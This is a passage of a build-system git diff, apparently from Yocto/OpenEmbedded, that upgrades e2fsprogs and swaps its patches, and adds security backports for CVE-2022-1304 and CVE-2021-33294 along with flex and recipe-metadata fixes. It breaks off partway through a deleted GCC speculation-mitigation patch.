-Upstream-Status: Submitted
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- misc/create_inode.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/misc/create_inode.c b/misc/create_inode.c
-index 8ce3faf..50fbaa8 100644
---- a/misc/create_inode.c
-+++ b/misc/create_inode.c
-@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino,
-
- inode.i_uid = st->st_uid;
- inode.i_gid = st->st_gid;
-- inode.i_mode |= st->st_mode;
-+ /*
-+ * The dir's mode has been set by ext2fs_mkdir() with umask, so
-+ * reset it to the source's mode
-+ */
-+ if S_ISDIR(st->st_mode)
-+ inode.i_mode = LINUX_S_IFDIR | st->st_mode;
-+ else
-+ inode.i_mode |= st->st_mode;
- inode.i_atime = st->st_atime;
- inode.i_mtime = st->st_mtime;
- inode.i_ctime = st->st_ctime;
---
-2.10.2
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
deleted file mode 100644
index de4bce0037..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:37:34 -0500
-Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when
- rehashing
-
-In e2fsck pass 3a, when we are rehashing directories, at least in
-theory, all of the directories should have had corruptions with
-respect to directory entry structure fixed. However, it's possible
-(for example, if the user declined a fix) that we can reach this stage
-of processing with a corrupted directory entries.
-
-So check for that case and don't try to process a corrupted directory
-block so we don't run into trouble in mutate_name() if there is a
-zero-length file name.
-
-Addresses: TALOS-2019-0973
-Addresses: CVE-2019-5188
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-CVE: CVE-2019-5188
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff]
----
- e2fsck/rehash.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index a5fc1be1..3dd1e941 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs,
- dir_offset += rec_len;
- if (dirent->inode == 0)
- continue;
-+ if ((name_len) == 0) {
-+ fd->err = EXT2_ET_DIR_CORRUPTED;
-+ return BLOCK_ABORT;
-+ }
- if (!fd->compress && (name_len == 1) &&
- (dirent->name[0] == '.'))
- continue;
-@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs,
- continue;
- }
- new_len = ext2fs_dirent_name_len(ent->dir);
-+ if (new_len == 0) {
-+ /* should never happen */
-+ ext2fs_unmark_valid(fs);
-+ continue;
-+ }
- memcpy(new_name, ent->dir->name, new_len);
- mutate_name(new_name, &new_len);
- for (j=0; j < fd->num_array; j++) {
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
new file mode 100644
index 0000000000..34e2567b25
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
@@ -0,0 +1,42 @@
+From a66071ed6a0d1fa666d22dcb78fa6fcb3bf22df3 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 27 May 2022 14:01:50 +0530
+Subject: [PATCH] CVE-2022-1304
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?h=maint&id=ab51d587bb9b229b1fade1afd02e1574c1ba5c76]
+CVE: CVE-2022-1304
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ lib/ext2fs/extent.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/ext2fs/extent.c b/lib/ext2fs/extent.c
+index ac3dbfec9..a1b1905cd 100644
+--- a/lib/ext2fs/extent.c
++++ b/lib/ext2fs/extent.c
+@@ -495,6 +495,10 @@ retry:
+ ext2fs_le16_to_cpu(eh->eh_entries);
+ newpath->max_entries = ext2fs_le16_to_cpu(eh->eh_max);
+
++ /* Make sure there is at least one extent present */
++ if (newpath->left <= 0)
++ return EXT2_ET_EXTENT_NO_DOWN;
++
+ if (path->left > 0) {
+ ix++;
+ newpath->end_blk = ext2fs_le32_to_cpu(ix->ei_block);
+@@ -1630,6 +1634,10 @@ errcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)
+
+ cp = path->curr;
+
++ /* Sanity check before memmove() */
++ if (path->left < 0)
++ return EXT2_ET_EXTENT_LEAF_BAD;
++
+ if (path->left) {
+ memmove(cp, cp + sizeof(struct ext3_extent_idx),
+ path->left * sizeof(struct ext3_extent_idx));
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 0000000000..caeb560d32
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
+Ensure "small" file systems also have the default inode size (256 bytes) so that
+can store 64-bit timestamps and work past 2038.
+
+The "small" type is any size >3MB and <512MB, which covers a lot of relatively
+small filesystems built by OE, especially when they're sized to fit the contents
+and expand to the storage on boot.
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
+index 01e35cf8..29f41dc0 100644
+--- a/misc/mke2fs.conf.in
++++ b/misc/mke2fs.conf.in
+@@ -16,7 +16,6 @@
+ }
+ small = {
+ blocksize = 1024
+- inode_size = 128
+ inode_ratio = 4096
+ }
+ floppy = {
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
deleted file mode 100644
index 342a2b855b..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From: Wang Shilong <wshilong@ddn.com>
-Date: Mon, 30 Dec 2019 19:52:39 -0500
-Subject: e2fsck: fix use after free in calculate_tree()
-
-The problem is alloc_blocks() will call get_next_block() which might
-reallocate outdir->buf, and memory address could be changed after
-this. To fix this, pointers that point into outdir->buf, such as
-int_limit and root need to be recaulated based on the new starting
-address of outdir->buf.
-
-[ Changed to correctly recalculate int_limit, and to optimize how we
- reallocate outdir->buf. -TYT ]
-
-Addresses-Debian-Bug: 948517
-Signed-off-by: Wang Shilong <wshilong@ddn.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01)
-
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01]
----
- e2fsck/rehash.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 0a5888a9..2574e151 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir,
- errcode_t retval;
-
- if (outdir->num >= outdir->max) {
-- retval = alloc_size_dir(fs, outdir, outdir->max + 50);
-+ int increment = outdir->max / 10;
-+
-+ if (increment < 50)
-+ increment = 50;
-+ retval = alloc_size_dir(fs, outdir, outdir->max + increment);
- if (retval)
- return retval;
- }
-@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs,
- if (retval)
- return retval;
-
-+ /* outdir->buf might be reallocated */
-+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset);
-+
- *next_ent = set_int_node(fs, block_start);
- *limit = (struct ext2_dx_countlimit *)(*next_ent);
- if (next_offset)
-@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs,
- return retval;
- }
- if (c3 == 0) {
-+ int delta1 = (char *)int_limit - outdir->buf;
-+ int delta2 = (char *)root - outdir->buf;
-+
- retval = alloc_blocks(fs, &limit, &int_ent,
- &dx_ent, &int_offset,
- NULL, outdir, i, &c2,
-@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs,
- if (retval)
- return retval;
-
-+ /* outdir->buf might be reallocated */
-+ int_limit = (struct ext2_dx_countlimit *)
-+ (outdir->buf + delta1);
-+ root = (struct ext2_dx_entry *)
-+ (outdir->buf + delta2);
- }
- dx_ent->block = ext2fs_cpu_to_le32(i);
- if (c3 != limit->limit)
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
index 4d335af4cf..284ac90196 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
@@ -1,4 +1,4 @@
-From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001
+From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001
From: Jackie Huang <jackie.huang@windriver.com>
Date: Wed, 10 Aug 2016 11:19:44 +0800
Subject: [PATCH] Fix missing check for permission denied.
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
index 95e6a7a2d5..aac88eed98 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
@@ -1,4 +1,4 @@
-From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001
+From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001
From: Ross Burton <ross.burton@intel.com>
Date: Mon, 23 Dec 2013 13:38:34 +0000
Subject: [PATCH] e2fsprogs: silence debugfs
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
index c97c0377e9..279923db8e 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
@@ -8,3 +8,4 @@ rm -f *.tmp
rm -f *.ok
rm -f *.failed
rm -f *.log
+cp ../data/test_data.tmp ./
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
index 4f7cafeac9..565c433866 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
@@ -4,19 +4,17 @@ SRC_URI += "file://remove.ldconfig.call.patch \
file://run-ptest \
file://ptest.patch \
file://mkdir_p.patch \
- file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \
file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \
file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \
- file://CVE-2019-5188.patch \
- file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \
- file://e2fsck-fix-use-after-free-in-calculate_tree.patch \
+ file://CVE-2022-1304.patch \
"
SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
file://quiet-debugfs.patch \
+ file://big-inodes-for-small-fs.patch \
"
-SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac"
+SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$"
EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \
@@ -56,6 +54,7 @@ do_install () {
oe_multilib_header ext2fs/ext2_types.h
install -d ${D}${base_bindir}
mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs
+ mv ${D}${bindir}/lsattr ${D}${base_bindir}/lsattr.e2fsprogs
install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/
@@ -104,10 +103,12 @@ FILES_libe2p = "${base_libdir}/libe2p.so.*"
FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*"
FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds"
-ALTERNATIVE_${PN} = "chattr"
+ALTERNATIVE_${PN} = "chattr lsattr"
ALTERNATIVE_PRIORITY = "100"
ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr"
ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs"
+ALTERNATIVE_LINK_NAME[lsattr] = "${base_bindir}/lsattr"
+ALTERNATIVE_TARGET[lsattr] = "${base_bindir}/lsattr.e2fsprogs"
ALTERNATIVE_${PN}-doc = "fsck.8"
ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8"
@@ -128,6 +129,8 @@ do_compile_ptest() {
}
do_install_ptest() {
+ # This file's permissions depends on the host umask so be deterministic
+ chmod 0644 ${B}/tests/test_data.tmp
cp -R --no-dereference --preserve=mode,links -v ${B}/tests ${D}${PTEST_PATH}/test
cp -R --no-dereference --preserve=mode,links -v ${S}/tests/* ${D}${PTEST_PATH}/test
sed -e 's!../e2fsck/e2fsck!e2fsck!g' \
@@ -141,4 +144,7 @@ do_install_ptest() {
install -d ${D}${PTEST_PATH}/lib
install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/
+
+ install -d ${D}${PTEST_PATH}/data
+ install -m 0644 ${B}/tests/test_data.tmp ${D}${PTEST_PATH}/data/
}
diff --git a/meta/recipes-devtools/elfutils/elfutils_0.178.bb b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
index c500ae3c19..29a3bbfffb 100644
--- a/meta/recipes-devtools/elfutils/elfutils_0.178.bb
+++ b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities and libraries for handling compiled object files"
HOMEPAGE = "https://sourceware.org/elfutils"
+DESCRIPTION = "elfutils is a collection of utilities and libraries to read, create and modify ELF binary files, find and handle DWARF debug data, symbols, thread state and stacktraces for processes and core files on GNU/Linux."
SECTION = "base"
LICENSE = "GPLv2 & LGPLv3+ & GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -33,6 +34,7 @@ SRC_URI = "https://sourceware.org/elfutils/ftp/${PV}/${BP}.tar.bz2 \
file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \
file://run-ptest \
file://ptest.patch \
+ file://CVE-2021-33294.patch \
"
SRC_URI_append_libc-musl = " \
file://0001-musl-obstack-fts.patch \
diff --git a/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
new file mode 100644
index 0000000000..0500a4cf83
--- /dev/null
+++ b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
@@ -0,0 +1,72 @@
+From 480b6fa3662ba8ffeee274bf0d37423413c01e55 Mon Sep 17 00:00:00 2001
+From: Mark Wielaard <mark@klomp.org>
+Date: Wed, 3 Mar 2021 21:40:53 +0100
+Subject: [PATCH] readelf: Sanity check verneed and verdef offsets in handle_symtab.
+
+We are going through vna_next, vn_next and vd_next in a while loop.
+Make sure that all offsets are sane. We don't want things to wrap
+around so we go in cycles.
+
+https://sourceware.org/bugzilla/show_bug.cgi?id=27501
+
+Signed-off-by: Mark Wielaard <mark@klomp.org>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=elfutils.git;a=commit;h=480b6fa3662ba8ffeee274bf0d37423413c01e55]
+CVE: CVE-2021-33294
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ChangeLog | 5 +++++
+ src/readelf.c | 10 +++++++++-
+ 2 files changed, 14 insertions(+), 1 deletion(-)
+
+diff --git a/src/ChangeLog b/src/ChangeLog
+index 6af977e..f0d9e39 100644
+--- a/src/ChangeLog
++++ b/src/ChangeLog
+@@ -1,3 +1,8 @@
++2021-03-03 Mark Wielaard <mark@klomp.org>
++
++ * readelf.c (handle_symtab): Sanity check verneed vna_next,
++ vn_next and verdef vd_next offsets.
++
+ 2019-11-26 Mark Wielaard <mark@klomp.org>
+
+ * Makefile.am (BUILD_STATIC): Add libraries needed for libdw.
+diff --git a/src/readelf.c b/src/readelf.c
+index 5994615..ab7a1c1 100644
+--- a/src/readelf.c
++++ b/src/readelf.c
+@@ -2550,7 +2550,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ &vernaux_mem);
+ while (vernaux != NULL
+ && vernaux->vna_other != *versym
+- && vernaux->vna_next != 0)
++ && vernaux->vna_next != 0
++ && (verneed_data->d_size - vna_offset
++ >= vernaux->vna_next))
+ {
+ /* Update the offset. */
+ vna_offset += vernaux->vna_next;
+@@ -2567,6 +2569,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found it. */
+ break;
+
++ if (verneed_data->d_size - vn_offset < verneed->vn_next)
++ break;
++
+ vn_offset += verneed->vn_next;
+ verneed = (verneed->vn_next == 0
+ ? NULL
+@@ -2602,6 +2607,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found the definition. */
+ break;
+
++ if (verdef_data->d_size - vd_offset < verdef->vd_next)
++ break;
++
+ vd_offset += verdef->vd_next;
+ verdef = (verdef->vd_next == 0
+ ? NULL
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
index b043c96543..ef5d83ebaf 100644
--- a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
+++ b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utility for modifying GPT disk partitioning"
DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks."
+HOMEPAGE = "https://sourceforge.net/projects/gptfdisk/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552"
diff --git a/meta/recipes-devtools/file/file_5.38.bb b/meta/recipes-devtools/file/file_5.38.bb
index 2d62ead10b..b19bf03986 100644
--- a/meta/recipes-devtools/file/file_5.38.bb
+++ b/meta/recipes-devtools/file/file_5.38.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
DEPENDS = "file-replacement-native"
DEPENDS_class-native = "bzip2-replacement-native"
-SRC_URI = "git://github.com/file/file.git"
+SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https"
SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
new file mode 100644
index 0000000000..c8202b6bd5
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
@@ -0,0 +1,32 @@
+From 440f3f55739468cd26e22f31871eca8cbbd53294 Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Wed, 6 Jan 2021 06:12:14 -0800
+Subject: [PATCH] Emit no #line directives if gen_line_dirs is false
+
+If we set --noline we should not print line directives.
+But setting --noline means gen_line_dirs is false.
+
+Upstream-Status: Submitted
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ src/buf.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/buf.c b/src/buf.c
+index 185083c..4439e28 100644
+--- a/src/buf.c
++++ b/src/buf.c
+@@ -95,8 +95,8 @@ struct Buf *buf_linedir (struct Buf *buf, const char* filename, int lineno)
+ const char *src;
+ size_t tsz;
+
+- if (gen_line_dirs)
+- return buf;
++ if (!gen_line_dirs)
++ return buf;
+
+ tsz = strlen("#line \"\"\n") + /* constant parts */
+ 2 * strlen (filename) + /* filename with possibly all backslashes escaped */
+--
+2.26.2.Cisco
+
diff --git a/meta/recipes-devtools/flex/flex/check-funcs.patch b/meta/recipes-devtools/flex/flex/check-funcs.patch
new file mode 100644
index 0000000000..762275e7f8
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/check-funcs.patch
@@ -0,0 +1,67 @@
+Subject: build: Move dnl comments out of AC_CHECK_FUNCS
+
+Due to a bug, autoheader (2.69) will treat M4 dnl comments in a quoted
+argument of AC_CHECK_FUNCS as function tokens and generate a lot of
+redundant and useless HAVE_* macros in config.h.in.
+(Examples: HAVE_DNL, HAVE_AVAILABLE_, HAVE_BY)
+
+It seems to be this commit dbb4e94dc7bacbcfd4acef4f085ef752fe1aa03f of
+mine that revealed this autoheader bug, and the affected config.h.in
+had been shipped within flex-2.6.4 release tarball.
+
+I have reported the autoheader bug here:
+<https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html>
+
+As a workaround, let's move comments out of AC_CHECK_FUNCS.
+
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Kang-Che Sung <explorer09@gmail.com>
+Signed-off-by: Zang Ruochen <zangrc.fnst@cn.fujitsu.com>
+---
+ configure.ac | 28 +++++++++++++---------------
+ 1 file changed, 13 insertions(+), 15 deletions(-)
+
+diff --git a/configure.ac b/configure.ac
+index 55e774b..5ea3a93 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -153,21 +153,19 @@ AC_FUNC_REALLOC
+ AS_IF([test "$cross_compiling" = yes],
+ AC_MSG_WARN([result $ac_cv_func_realloc_0_nonnull guessed because of cross compilation]))
+
+-AC_CHECK_FUNCS([dup2 dnl
+-memset dnl
+-regcomp dnl
+-strcasecmp dnl
+-strchr dnl
+-strdup dnl
+-strtol dnl
+-], [], [AC_MSG_ERROR(required library function not found on your system)])
+-
+-# Optional library functions
+-AC_CHECK_FUNCS([dnl
+-pow dnl Used only by "examples/manual/expr"
+-setlocale dnl Needed only if NLS is enabled
+-reallocarray dnl OpenBSD function. We have replacement if not available.
+-])
++dnl Autoheader (<= 2.69) bug: "dnl" comments in a quoted argument of
++dnl AC_CHECK_FUNCS will expand wierdly in config.h.in.
++dnl (https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html)
++
++AC_CHECK_FUNCS([dup2 memset regcomp strcasecmp strchr strdup strtol], [],
++ [AC_MSG_ERROR(required library function not found on your system)])
++
++# Optional library functions:
++# pow - Used only by "examples/manual/expr".
++# setlocale - Needed only if NLS is enabled.
++# reallocarr - NetBSD function. Use reallocarray if not available.
++# reallocarray - OpenBSD function. We have replacement if not available.
++AC_CHECK_FUNCS([pow setlocale reallocarr reallocarray])
+
+ AC_CONFIG_FILES(
+ Makefile
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 43b2547fc6..50d3bf8de1 100644
--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -15,6 +15,8 @@ SRC_URI = "https://github.com/westes/flex/releases/download/v${PV}/flex-${PV}.ta
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
${@bb.utils.contains('PTEST_ENABLED', '1', '', 'file://disable-tests.patch', d)} \
file://0001-build-AC_USE_SYSTEM_EXTENSIONS-in-configure.ac.patch \
+ file://check-funcs.patch \
+ file://0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch \
"
SRC_URI[md5sum] = "2882e3179748cc9f9c23ec593d6adc8d"
@@ -24,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
+# Disputed - yes there is stack exhaustion but no bug and it is building the
+# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address
+# https://github.com/westes/flex/issues/414
+CVE_CHECK_WHITELIST += "CVE-2019-6293"
+
inherit autotools gettext texinfo ptest
M4 = "${bindir}/m4"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
deleted file mode 100644
index a7e29f4bd7..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
+++ /dev/null
@@ -1,204 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 20da13e395bde597d8337167c712039c8f923c3b Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:58 +0100
-Subject: [PATCH 1/3] aarch64: New Straight Line Speculation (SLS) mitigation
- flags
-
-Here we introduce the flags that will be used for straight line speculation.
-
-The new flag introduced is `-mharden-sls=`.
-This flag can take arguments of `none`, `all`, or a comma seperated list
-of one or more of `retbr` or `blr`.
-`none` indicates no special mitigation of the straight line speculation
-vulnerability.
-`all` requests all mitigations currently implemented.
-`retbr` requests that the RET and BR instructions have a speculation
-barrier inserted after them.
-`blr` requests that BLR instructions are replaced by a BL to a function
-stub using a BR with a speculation barrier after it.
-
-Setting this on a per-function basis using attributes or the like is not
-enabled, but may be in the future.
-
-(cherry picked from commit a9ba2a9b77bec7eacaf066801f22d1c366a2bc86)
-
-gcc/ChangeLog:
-
-2020-06-02 Matthew Malcomson <matthew.malcomson@arm.com>
-
- * config/aarch64/aarch64-protos.h (aarch64_harden_sls_retbr_p):
- New.
- (aarch64_harden_sls_blr_p): New.
- * config/aarch64/aarch64.c (enum aarch64_sls_hardening_type):
- New.
- (aarch64_harden_sls_retbr_p): New.
- (aarch64_harden_sls_blr_p): New.
- (aarch64_validate_sls_mitigation): New.
- (aarch64_override_options): Parse options for SLS mitigation.
- * config/aarch64/aarch64.opt (-mharden-sls): New option.
- * doc/invoke.texi: Document new option.
----
- gcc/config/aarch64/aarch64-protos.h | 3 ++
- gcc/config/aarch64/aarch64.c | 76 +++++++++++++++++++++++++++++
- gcc/config/aarch64/aarch64.opt | 4 ++
- gcc/doc/invoke.texi | 12 +++++
- 4 files changed, 95 insertions(+)
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index c083cad53..31493f412 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,4 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+extern bool aarch64_harden_sls_retbr_p (void);
-+extern bool aarch64_harden_sls_blr_p (void);
-+
- #endif /* GCC_AARCH64_PROTOS_H */
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index b452a53af..269ff6c92 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -11734,6 +11734,79 @@ aarch64_validate_mcpu (const char *str, const struct processor **res,
- return false;
- }
-
-+/* Straight line speculation indicators. */
-+enum aarch64_sls_hardening_type
-+{
-+ SLS_NONE = 0,
-+ SLS_RETBR = 1,
-+ SLS_BLR = 2,
-+ SLS_ALL = 3,
-+};
-+static enum aarch64_sls_hardening_type aarch64_sls_hardening;
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the RET
-+ and BR instructions. */
-+bool
-+aarch64_harden_sls_retbr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_RETBR;
-+}
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the BLR
-+ instruction. */
-+bool
-+aarch64_harden_sls_blr_p (void)
-+{
